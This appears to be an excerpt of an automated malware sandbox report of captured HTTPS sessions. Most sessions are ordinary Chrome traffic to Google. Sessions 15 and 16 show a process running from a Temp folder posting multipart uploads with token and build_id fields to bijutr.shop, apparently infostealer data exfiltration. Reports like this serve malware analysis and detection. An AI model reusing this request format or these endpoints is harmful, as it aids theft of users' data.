                                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:45 GMT
                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC372INData Raw: 31 32 64 65 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 12de)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC296INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC945INData Raw: 33 61 61 0d 0a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 5c 75 30 30 33 63 69 6d 61 67 65 20 73 72 63 5c 75 30 30 33 64 5c 22 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 61 72 2f 61 6c 2d 69 63 6f 6e 2e 70 6e 67 5c 22 20 61 6c 74 5c 75 30 30 33 64 5c 22 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 5c 5c 39 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 69 6d 61 67 65 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30
                                                                                                                                                                                                                                                                                                      Data Ascii: 3aa\"\u003e\u003c\/path\u003e\u003cimage src\u003d\"https://ssl.gstatic.com/gb/images/bar/al-icon.png\" alt\u003d\"\" height\u003d\"24\" width\u003d\"24\" style\u003d\"border:none;display:none \\9\"\u003e\u003c\/image\u003e\u003c\/svg\u003e\u003c\/a\u00
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 38 30 30 30 0d 0a 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35
                                                                                                                                                                                                                                                                                                      Data Ascii: 8000eft_product_control_placeholder_label":["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700283,3700949,3701384,102278205
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 47 64 3b 5f 2e 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75
                                                                                                                                                                                                                                                                                                      Data Ascii: umpException(e)}\ntry{\n/*\n\n Copyright Google LLC\n SPDX-License-Identifier: Apache-2.0\n*/\nvar Gd;_.Ed\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfu
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 30 30 32 36 28 52 64 5c 75 30 30 33 64 51 64 28 29 29 3b 72 65 74 75 72 6e 20 52 64 7d 3b 5c 6e 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 53 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 54 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: 0026(Rd\u003dQd());return Rd};\n_.Ud\u003dfunction(a){const b\u003d_.Sd();return new _.Td(b?b.createScriptURL(a):a)};_.Vd\u003dfunction(a){if(a instanceof _.Td)return a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunctio
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a
                                                                                                                                                                                                                                                                                                      Data Ascii: tring\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db||document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      14192.168.2.649808172.217.21.364435648C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:45 GMT
                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      15192.168.2.649831188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:49 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----F3E37GL6XLN7YU3OPP89
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:49 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------F3E37GL6XLN7YU3OPP89Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:50 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      16192.168.2.649836188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----00RQI5FKFUSJMYU379R9
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 213453
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------00RQI5FKFUSJMYU379R9Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
